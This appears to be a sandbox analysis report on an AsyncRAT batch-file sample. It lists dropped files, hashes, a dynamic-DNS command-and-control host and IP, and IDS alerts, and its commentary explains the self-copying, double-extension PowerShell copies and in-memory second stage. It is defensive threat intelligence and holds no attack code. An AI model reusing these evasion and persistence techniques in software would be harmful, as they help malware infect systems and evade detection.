MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (empty in the report)
PID 668 powershell.exe -> C:\Users\admin\AppData\Local\Temp\lcijmvrg.aod.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (empty in the report)
PID 2072 rain.bat.exe -> C:\Users\admin\AppData\Roaming\lveka.bat (text)
MD5: F224D4174FE90EB1F75EBD0A0B91ADFB
SHA256: 66F273E6E122F7CDF0536864EACFDFBAF76634557165F7773C5B38E8C68BBF4B
PID 668 powershell.exe -> C:\Users\admin\AppData\Local\Temp\stadzmfv.yhf.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (empty in the report)
PID 1972 cmd.exe -> C:\Users\admin\AppData\Roaming\lveka.bat.exe (executable)
MD5: EB32C070E658937AA9FA9F3AE629B2B8
SHA256: 70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
PID 1056 cmd.exe -> C:\Users\admin\AppData\Local\Temp\rain.bat.exe (executable)
MD5: EB32C070E658937AA9FA9F3AE629B2B8
SHA256: 70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
PID 2072 rain.bat.exe -> C:\Users\admin\AppData\Local\Temp\5ipfb5r3.ele.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (empty in the report)
PID 1536 powershell.exe -> C:\Users\admin\AppData\Local\Temp\rb4hvkyy.pwx.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256: (empty in the report)
PID 2128 lveka.bat.exe -> C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (binary)
MD5: 6675EDE59684F4A119D2E5DA282AFBE6
SHA256: 5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829

Reading the hashes: lveka.bat has the same MD5 and SHA256 as the submitted rain.bat, so the batch file copies itself to %AppData% unchanged; rain.bat.exe and lveka.bat.exe share one hash and carry the PE description "Windows PowerShell" with version 10.0.14409.1005, the same as PID 668, so each is the host's powershell.exe copied under a double extension. MD5 C4CA4238A0B923820DCC509A6F75849B is the hash of the single character "1": the random-named .ps1/.psm1 files and the ModuleAnalysisCache are PowerShell's own scratch files, not payloads. Within the monitored scope no decrypted assembly is written to disk; the second stage is loaded from memory.
HTTP(S) requests: 0
TCP/UDP connections: 16
DNS requests: 5
Threats: 4

HTTP requests

No HTTP requests

Connections

PID 4 System -> 192.168.100.255:138 (whitelisted)
PID 4 System -> 192.168.100.255:137 (whitelisted)
PID 1080 svchost.exe -> 224.0.0.252:5355 (unknown)
PID 2128 lveka.bat.exe -> 45.74.34.32:1994 (hicham157484.ddns.net, ASN M247 Ltd, country US, reputation unknown)
The first three are Windows background noise (NetBIOS name and datagram broadcasts on UDP 137/138 and LLMNR multicast on 224.0.0.252:5355). The only sample-driven connection is the AsyncRAT process reaching the C2 host and port from its configuration, which is also what the "Connects to unusual port" indicator fires on.

DNS requests

hicham157484.ddns.net -> 45.74.34.32 (malicious)
dns.msftncsi.com -> 131.107.255.255 (shared)
dns.msftncsi.com is the Windows Network Connectivity Status Indicator probe, not sample traffic; the only sample-driven lookup is the dynamic-DNS C2 host.

Threats

PID 1080 svchost.exe, Potentially Bad Traffic: ET POLICY DNS Query to DynDNS Domain *.ddns .net (4 alerts)
The alerts are attributed to svchost.exe because the DNS Client service resolves names on behalf of other processes; the lookup and the resulting TCP 1994 connection belong to lveka.bat.exe (PID 2128).